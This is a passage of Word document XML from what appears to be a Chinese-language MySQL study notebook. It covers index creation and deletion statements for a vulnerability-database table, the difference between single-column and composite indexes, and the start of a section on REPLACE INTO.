        <w:t>PRIMARY KEY ("id") USING BTREE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432EB325" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  UNIQUE KEY "blingsec_id_index" ("id") USING HASH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B7A11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  KEY "affect_app_index" ("affect_app") USING HASH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6C007" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  KEY "affect_app_version_index" ("affect_app_version") USING BTREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C21D570" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 ROW_FORMAT=DYNAMIC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905FE21" w14:textId="4DF05BBD" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18FC5055" w14:textId="22A28B39" w:rsidR="007B66B4" w:rsidRDefault="007B66B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C3C1FA" w14:textId="15BF2FC6" w:rsidR="007B66B4" w:rsidRDefault="007B66B4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建索引语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33222668" w14:textId="77777777" w:rsidR="007B66B4" w:rsidRDefault="007B66B4" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cnvd_cnvd_id_IDX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BTREE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sca.cnvd (cnvd_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CDFDF1" w14:textId="77777777" w:rsidR="0096164D" w:rsidRDefault="0096164D" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FULLTEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cnvd_cnvd_id_IDX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sca.cnvd (cnvd_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCDD574" w14:textId="09613075" w:rsidR="007B66B4" w:rsidRDefault="007B66B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708CA216" w14:textId="56510258" w:rsidR="00C85A71" w:rsidRDefault="00C85A71" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B7BFA" w14:textId="751FEE59" w:rsidR="00C85A71" w:rsidRPr="0096164D" w:rsidRDefault="00C85A71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>ALTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  sca.cnvd  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  cnvd_cnvd_id_IDX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB42C7" w14:textId="77777777" w:rsidR="007B66B4" w:rsidRDefault="007B66B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F32D06" w14:textId="110E2A7A" w:rsidR="004C452C" w:rsidRDefault="000C372C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单列索引和复合索引</w:t>
      </w:r>
      <w:r w:rsidR="00226B1F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（多列的一个索引）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE57C4D" w14:textId="77777777" w:rsidR="000C372C" w:rsidRDefault="000C372C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB84EC4" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中同时对两个列新建一个复合索引与分别对两个列新建单列索引，这两者是有区别的。首先，需要了解索引的基本概念：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB261A3" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0958790B" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引是一种特殊的文件，它们包含着对数据表里所有记录的引用指针。更通俗的说，数据库索引就好比一本书前面的目录，能加快数据库的查询速度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222851C5" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD5C3EF" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009D5131">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对于单列索引和复合索引的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CAB211" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691E14F5" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE783D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>单列索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：是最常见的索引类型，它是基于单个表列的索引。如果你对两个列分别创建索引，那么这两个索引就是独立的。也就是说，如果你在一个查询中同时使用了这两个列，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只会使用其中一个索引来优化查询（通常是能提供最大过滤效果的那个）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不会在同一表的多个单列索引之间做</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"AND"</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216F297" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056560CD" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE783D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>复合索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：复合索引是基于表中的多个列的。如果你</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同时对两个列创建一个索引，那么这就是一个复合索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在查询中，如果你同时使用了这两个列，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会利用这个复合索引。此外，</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>复合索引的左侧是可以单独使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，如果你有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(col1, col2)</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的索引，那么这个索引可以用于优化对</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>col1</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的查询，对于同时涉及</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>col1</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>col2</w:t>
      </w:r>
      <w:r w:rsidRPr="007547F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也可以优化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F5910" w14:textId="77777777" w:rsidR="00FF751B" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6236C274" w14:textId="22488452" w:rsidR="000C372C" w:rsidRDefault="00FF751B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择使用单列索引还是复合索引，主要取决于你的查询需求。如果你的查询通常会同时包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>含这两个列，那么复合索引可能会更有优势。但是，如果你的查询通常只包含其中一个列，那么可能需要单独对每个列进行索引。需要注意的是，索引虽然可以提高查询性能，但同时也会占用磁盘空间，并且在插入、删除和更新数据时也会有性能损耗。因此，选择何种索引需要根据具体情况来权衡。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0AEE9F" w14:textId="77777777" w:rsidR="000C372C" w:rsidRDefault="000C372C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E0659C" w14:textId="77777777" w:rsidR="000C372C" w:rsidRDefault="000C372C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A1ED55" w14:textId="77777777" w:rsidR="000C372C" w:rsidRDefault="000C372C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22455D6A" w14:textId="3F5381D6" w:rsidR="00BA54C4" w:rsidRDefault="00BA54C4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc159779530"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>eplace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="7A7D332A" w14:textId="58DA8818" w:rsidR="00BA54C4" w:rsidRDefault="00347599" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00347599">
        <w:t>https://blog.csdn.net/risingsun001/article/details/38977797</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FA26C" w14:textId="6F54D888" w:rsidR="00BA54C4" w:rsidRDefault="00BA54C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE6A6C1" w14:textId="77777777" w:rsidR="00D45C51" w:rsidRDefault="00D45C51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>经过我的实验，我这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里说法上更严谨一些，是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>约束（描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>primary</w:t>
      </w:r>
